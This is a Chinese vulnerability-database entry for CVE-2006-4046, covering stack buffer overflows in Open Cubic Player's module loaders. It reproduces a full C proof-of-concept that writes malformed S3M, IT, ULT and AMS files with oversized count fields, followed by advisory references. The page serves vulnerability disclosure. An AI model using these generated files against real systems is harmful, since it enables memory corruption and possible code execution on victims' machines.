Open Cubic Player多个缓冲区溢出漏洞

漏洞ID 1110719 漏洞类型 缓冲区溢出
发布时间 2006-07-31 更新时间 2006-08-14
CVE编号 CVE-2006-4046 CNNVD-ID CNNVD-200608-131
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2094
https://cxsecurity.com/issue/WLB-2006080058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-131
|漏洞详情
Windows操作系统下的OpenCubicPlayer2.6.0pre6及早期版本,和Linux/BSD下的0.1.10_rc5及早期版本中存在多个堆栈缓冲区溢出漏洞,远程攻击者可借助:(1)mpLoadS3M函数处理的超大.S3M文件,(2)itplayerclass::module::load函数处理的特制的.IT文件,(3)mpLoadULT函数处理的特制的.ULT文件,或(4)mpLoadAMS函数处理的特制的.AMS文件,来执行任意代码。
|漏洞EXP
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>



#define VER         "0.1"               // tool version, spliced into the banner printed by main()
#define POCNAME     "proof-of-concept"  // filler written into the module's name/title fields



/* Little-endian, byte-oriented writers used to lay out each file; all write to fd in order. */
void fwbof(FILE *fd, int len, int chr);                 // `len` copies of byte `chr`
void fwi08(FILE *fd, int num);                          // low 8 bits of num
void fwi16(FILE *fd, int num);                          // low 16 bits, little-endian
void fwi32(FILE *fd, int num);                          // low 32 bits, little-endian
void fwstx(FILE *fd, uint8_t *str, int size);           // str as a fixed-width field of `size` bytes, zero-padded
void fwmem(FILE *fd, uint8_t *data, int size);          // `size` raw bytes
void std_err(void);                                     // perror() + exit(1)



#pragma pack(1)

/*
 * S3M header as emitted by attack 1; 96 bytes under #pragma pack(1).
 * main() sets name, kennung (0x1a), typ (16), ordnum (800) and the "SCRM"
 * tag and leaves every other field zero.  The meaning of the remaining
 * fields is not established by this file; check a format reference.
 */
typedef struct {
    int8_t      name[28];   // zero-padded title (signed element type: strncpy() needs a char * cast)
    uint8_t     kennung;    // set to 0x1a by main()
    uint8_t     typ;        // set to 16 by main()
    uint8_t     dummy[2];
    uint16_t    ordnum;     // order count; 800 here, and the loader reads that many order bytes after the header
    uint16_t    insnum;
    uint16_t    patnum;
    uint16_t    flags;
    uint16_t    cwtv;
    uint16_t    ffi;
    int8_t      scrm[4];    // "SCRM" tag
    uint8_t     gv;
    uint8_t     is;
    uint8_t     it;
    uint8_t     mv;
    uint8_t     uc;
    uint8_t     dp;
    uint8_t     dummy2[8];
    uint16_t    special;
    uint8_t     chanset[32];
} s3m_t;

/*
 * IT header as emitted by attack 2; 64 bytes under #pragma pack(1).
 * main() sets sign ("IMPM"), name, Cmwt (0x200) and OrdNum (1000) and
 * then writes two further 64-byte zero tables before the order list.
 */
typedef struct {
    uint8_t     sign[4];    // "IMPM"
    uint8_t     name[26];   // zero-padded title
    uint16_t    PHiligt;
    uint16_t    OrdNum;     // 1000 here: the count the order loop below writes, flagged "buffer-overflow" by the author
    uint16_t    InsNum;     // left 0 (the 200 variant is commented out in main())
    uint16_t    SmpNum;
    uint16_t    PatNum;
    uint16_t    Cwtv;
    uint16_t    Cmwt;       // set to 0x200 by main()
    uint16_t    Flags;
    uint16_t    Special;
    uint8_t     GV;
    uint8_t     MV;
    uint8_t     IS;
    uint8_t     IT;
    uint8_t     Sep;
    uint8_t     PWD;
    uint16_t    MsgLgth;
    uint32_t    MsgOff;
    uint32_t    Reserved;
} it_t;

#define AMSNAMELEN  8       // < 128
/*
 * AMS fixed header as emitted by attack 4; 13 bytes under #pragma pack(1).
 * It follows the "AMShdr\x1A" signature, the length-prefixed name and the
 * 16-bit file version.  main() only sets ins (= 1); all other fields are 0.
 */
typedef struct {
    uint8_t     ins;        // instrument count; main() writes one instrument record per unit
    uint16_t    pat;
    uint16_t    pos;
    uint16_t    bpm;
    uint8_t     speed;
    uint8_t     defchn;
    uint8_t     defcmd;
    uint8_t     defrow;
    uint16_t    flags;
} ams_t;

#pragma pack()



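/*
 * Writes one packed header struct to fd, aborting via std_err() on a
 * short write so a partially written file is not reported as finished.
 */
static void fwhdr(FILE *fd, const void *hdr, size_t size) {
    if(fwrite(hdr, size, 1, fd) != 1) std_err();
}

/*
 * Entry point.  argv[1] selects which of the four malformed module files
 * to generate (1..4), argv[2] is the output path.  Each branch writes a
 * header whose count/length field is far larger than the data the format
 * would normally carry; the advisory above names the loader function that
 * mishandles each one.  The byte sequence written per attack is the same
 * as in the original listing.
 *
 * Differences from the original: the attack number is validated before the
 * output file is opened (so a bad number no longer leaves an empty file and
 * exit status 0), header writes and fclose() are checked, and the char * /
 * uint8_t * mismatches are cast explicitly.
 *
 * Returns 0 on success; exits with status 1 on usage or I/O errors.
 */
int main(int argc, char *argv[]) {
    FILE    *fd;
    s3m_t   s3m;
    it_t    it;
    ams_t   ams;
    int     i,
            j,
            tmp,
            attack;
    char    *fname,
            *end;

    setbuf(stdout, NULL);

    fputs("\n"
        "Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <output_file>\n"
            "\n"
            "Attacks:\n"
            " 1 = buffer-overflow in mpLoadS3M        (*.S3M)\n"
            " 2 = buffer-overflow in itload.cpp       (*.IT)\n"
            " 3 = buffer-overflow in mpLoadULT        (*.ULT)\n"
            " 4 = buffer-overflow (envs) in mpLoadAMS (*.AMS)\n"
            "\n", argv[0]);
        exit(1);
    }

    // strtol() with an end-pointer check: atoi() would silently turn
    // "abc" into 0 and "1x" into 1.  Range-check before touching the disk.
    attack = (int)strtol(argv[1], &end, 10);
    if(end == argv[1] || *end != '\0' || attack < 1 || attack > 4) {
        printf("\nError: you must specify the right attack number\n");
        exit(1);
    }
    fname  = argv[2];

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

    if(attack == 1) {

        // S3M: 96-byte header, then ordnum order bytes.
        memset(&s3m, 0, sizeof(s3m));
        // strncpy() is the right tool here: fixed-width field, zero padded,
        // no terminator required.
        strncpy((char *)s3m.name, POCNAME, sizeof(s3m.name));
        s3m.kennung = 0x1a;
        s3m.typ     = 16;
        s3m.ordnum  = 800;
        memcpy(s3m.scrm, "SCRM", 4);

        fwhdr(fd, &s3m, sizeof(s3m));

        fwbof(fd, s3m.ordnum - 1, 'a');                 // 799 order bytes
        fputc(0, fd);                                   // for forcing "return errFormMiss"

    } else if(attack == 2) {

        // IT: 64-byte header, two 64-byte zero tables, then OrdNum order bytes.
        memset(&it, 0, sizeof(it));
        memcpy(it.sign, "IMPM", 4);
        strncpy((char *)it.name, POCNAME, sizeof(it.name));
        it.Cmwt   = 0x200;
        it.OrdNum = 1000;                               // buffer-overflow
//        it.InsNum = 200;                                // buffer-overflow

        fwhdr(fd, &it, sizeof(it));

        fwbof(fd, 64, 0);                               // first 64-byte table, all zero
        fwbof(fd, 64, 0);                               // second 64-byte table, all zero
        for(i = 0; i < it.OrdNum; i++) fwi08(fd, 'a');
        // InsNum, SmpNum and PatNum are 0 after the memset, so these loops
        // currently write nothing; kept so the commented-out InsNum variant
        // above works unchanged.
        for(i = 0; i < it.InsNum; i++) fwi32(fd, 'a');
        for(i = 0; i < it.SmpNum; i++) fwi32(fd, 'a');
        for(i = 0; i < it.PatNum; i++) fwi32(fd, 'a');

    } else if(attack == 3) {

        // ULT: signature, version byte '4', 32-byte title, counts, orders,
        // then a channel count of 0x7f followed by that many bytes.
        fwmem(fd, (uint8_t *)"MAS_UTrack_V00", 14);
        fwi08(fd, 3 + '1');
        fwstx(fd, (uint8_t *)POCNAME, 32);
        fwi08(fd, 0);                                   // msglen
        fwi08(fd, 0);                                   // insnum
        fwbof(fd, 256, 0);                              // orders
        tmp = 0x7f;
        fwi08(fd, tmp);                                 // chnn
        fwi08(fd, 0);                                   // patn
        fwbof(fd, tmp, 'a');                            // buffer-overflow

            // possible heap overflow with chbp, patlength = 0

    } else {                                            // attack == 4, validated above

        // AMS: signature, length-prefixed name, file version, 13-byte
        // header with one instrument, then per-instrument records whose
        // three envelopes each claim 0xff points.
        fwmem(fd, (uint8_t *)"AMShdr\x1A", 7);          // sig
        fwi08(fd, AMSNAMELEN);                          // sig[7]
        fwbof(fd, AMSNAMELEN, 'a');                     // name
        fwi16(fd, 0x202);                               // filever

        memset(&ams, 0, sizeof(ams));
        ams.ins = 1;

        fwhdr(fd, &ams, sizeof(ams));

        for(j = 0; j < ams.ins; j++) {
            fwi08(fd, AMSNAMELEN);                      // namelen
            fwbof(fd, AMSNAMELEN, 'a');                 // name
            fwi08(fd, 1);                               // smpnum

            fwbof(fd, 120, 0);                          // samptab

            for(i = 0; i < 3; i++) {                    // envs
                tmp = 0xff;
                fwi08(fd, 0);                           // speed
                fwi08(fd, 0);                           // sustain
                fwi08(fd, 0);                           // loopstart
                fwi08(fd, 0);                           // loopend
                fwi08(fd, tmp);                         // points
                fwbof(fd, tmp * 3, 'a');                // 3 bytes per point
            }
        }
    }

    // fclose() flushes the buffered output; a failure here means the file
    // on disk is incomplete, so report it rather than print "finished".
    if(fclose(fd) != 0) std_err();
    printf("- finished\n");
    return(0);
}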



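/*
 * Writes `len` copies of the byte `chr` (low 8 bits, as fputc() does) to fd.
 * A zero or negative `len` writes nothing; the original `while(len--)` form
 * kept looping on a negative count until the int wrapped (undefined
 * behaviour).  Stops early if fputc() reports an error so a dead stream
 * does not spin through the whole count.
 */
void fwbof(FILE *fd, int len, int chr) {
    for(int i = 0; i < len; i++) {
        if(fputc(chr, fd) == EOF) break;
    }
}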



/* Writes the low 8 bits of `num` to fd as a single byte. */
void fwi08(FILE *fd, int num) {
    unsigned char lo = (unsigned char)(num & 0xff);
    fputc(lo, fd);
}



/* Writes the low 16 bits of `num` to fd, least significant byte first. */
void fwi16(FILE *fd, int num) {
    unsigned int bits = (unsigned int)num;
    for(int shift = 0; shift < 16; shift += 8) {
        fputc((int)((bits >> shift) & 0xffu), fd);
    }
}



/* Writes the low 32 bits of `num` to fd, least significant byte first. */
void fwi32(FILE *fd, int num) {
    unsigned int bits = (unsigned int)num;
    for(int shift = 0; shift < 32; shift += 8) {
        fputc((int)((bits >> shift) & 0xffu), fd);
    }
}



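/*
 * Writes `str` as a fixed-width field of exactly `size` bytes: the bytes
 * up to the first NUL, then zero padding.  Strings longer than `size`
 * are truncated without a terminator.  The bound is checked before the
 * byte is read, so a `size`-byte buffer with no NUL is never read one
 * past its end (the original tested str[i] first).  Negative `size`
 * writes nothing.
 */
void fwstx(FILE *fd, uint8_t *str, int size) {
    int i = 0;

    for(; i < size && str[i]; i++) {
        fputc(str[i], fd);
    }
    for(; i < size; i++) {
        fputc(0, fd);
    }
}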



/* Writes `size` raw bytes from `data` to fd; the fwrite() result is not checked. */
void fwmem(FILE *fd, uint8_t *data, int size) {
    const size_t count = (size_t)size;
    fwrite(data, 1, count, fd);
}



/* Reports the current errno on stderr with an "\nError" prefix and exits with status 1. */
void std_err(void) {
    const char *prefix = "\nError";

    perror(prefix);
    exit(1);
}

// milw0rm.com [2006-07-31]
|参考资料

来源:XF
名称:opencubicplayer-mploadams-bo(28106)
链接:http://xforce.iss.net/xforce/xfdb/28106
来源:XF
名称:opencubicplayer-mploadult-bo(28105)
链接:http://xforce.iss.net/xforce/xfdb/28105
来源:XF
名称:opencubicplayer-itplayerclassmoduleload-bo(28104)
链接:http://xforce.iss.net/xforce/xfdb/28104
来源:XF
名称:opencubicplayer-mploads3m-bo(28103)
链接:http://xforce.iss.net/xforce/xfdb/28103
来源:BID
名称:19262
链接:http://www.securityfocus.com/bid/19262
来源:BUGTRAQ
名称:20060731 Multiple vulnerabilities in Open Cubic Player 2.6.0pre6/0.1.10_rc5
链接:http://www.securityfocus.com/archive/1/archive/1/441730/100/100/threaded
来源:VUPEN
名称:ADV-2006-3078
链接:http://www.frsirt.com/english/advisories/2006/3078
来源:SECTRACK
名称:1016611
链接:http://securitytracker.com/id?1016611
来源:SECUNIA
名称:21267
链接:http://secunia.com/advisories/21267
来源:MISC
链接:http://aluigi.altervista.org/adv/ocpbof-adv.txt
来源:SREASON
名称:1349
链接:http://securityreason.com/securityalert/1349
来源:MILW0RM
名称:2094
链接:http://milw0rm.com/exploits/2094